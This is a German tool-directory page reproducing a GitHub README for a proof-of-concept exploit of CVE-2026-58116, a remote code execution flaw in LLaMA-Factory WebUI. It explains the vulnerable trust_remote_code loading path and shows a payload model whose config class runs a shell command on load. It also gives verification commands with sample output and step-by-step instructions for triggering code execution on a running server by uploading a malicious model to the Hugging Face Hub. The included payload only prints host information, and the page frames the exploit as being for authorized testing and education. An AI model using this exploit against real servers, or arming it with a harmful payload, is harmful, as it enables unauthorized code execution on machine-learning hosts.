Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — Proof-of-concept-Exploit für CVE-2026-58116, das Remote-Code-Ausführung in der LLaMA-Factory-WebUI über trust_remote_code-Modellpfad-Injection demonstriert. Enthält Payload-Modell und Verifikationsskript für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationCTFPapers & ForschungLernen & BildungPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

Proof-of-concept-Exploit für CVE-2026-58116, das Remote-Code-Ausführung in der LLaMA-Factory-WebUI über trust_remote_code-Modellpfad-Injection demonstriert. Enthält Payload-Modell und Verifikationsskript für autorisierte Sicherheitstests.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

CVE-2026-58116 — LLaMA-Factory WebUI RCE via trust_remote_code

Proof of Concept für CVE-2026-58116 (CVSS 9.8 Critical): Remote Code Execution in LLaMA-Factory <= v0.9.5.

Die LLaMA-Factory WebUI kodiert trust_remote_code=True beim Laden eines Modells hard (src/llamafactory/webui/chatter.py:139 und runner.py:175,320). Das angreifergesteuerte Feld „Model path" fließt unvalidiert in AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(), sodass die Hugging Face transformers-Bibliothek beliebigen Python-Code von einem bösartigen Modell-Repository herunterlädt und ausführt.

⚠️ Nur zu Bildungszwecken

Dieses PoC ist nur für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Die enthaltene Nutzlast ist absichtlich harmlos (sie gibt Host-Informationen via id aus). Führen Sie es nur gegen Systeme aus, die Ihnen gehören oder für die Sie autorisiert sind. Setzen Sie niemals eine bösartige Nutzlast gegen Infrastruktur ohne ausdrückliche Genehmigung ein.

Inhalt

root@kitploit:~
.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

Wie der Angriffspunkt funktioniert

transformers instanziiert die Config-Klasse bevor irgendwelche Gewichte geladen werden, sodass die Nutzlast in PoCConfig.__init__ ausgelöst wird, sobald die Konfiguration gelesen wird – es müssen keine Gewichte existieren. Genau das ist der Pfad, den LLaMA-Factory über src/llamafactory/model/loader.py erreicht:

root@kitploit:~
def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

Schnellstart

Überprüfen Sie den Angriffspunkt lokal (kein WebUI nötig – beweist den Vertrag, den das WebUI verletzt):

root@kitploit:~
pip install transformers torch
python3 build_and_verify.py

Erwartete Ausgabe – beachten Sie, dass der Nutzlast-Banner während des Ladens der Konfiguration erscheint:

root@kitploit:~
[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

Ende-zu-Ende über eine laufende LLaMA-Factory WebUI:

  1. Laden Sie das PoC-Modell auf den Hub hoch:
    root@kitploit:~
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. Starten Sie ein betroffenes LLaMA-Factory-Board: llamafactory-cli webui
  3. Öffnen Sie den Chat-Tab, setzen Sie Model path auf your-user/llmfcty-poc, klicken Sie auf Load Model.
  4. Die Nutzlast wird auf dem Server als LLaMA-Factory-Prozess ausgeführt.

Referenzen

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • VulnCheck-Bericht: https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • Ursprüngliche Veröffentlichung (h3nrrrych4u): https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
Tool herunterladen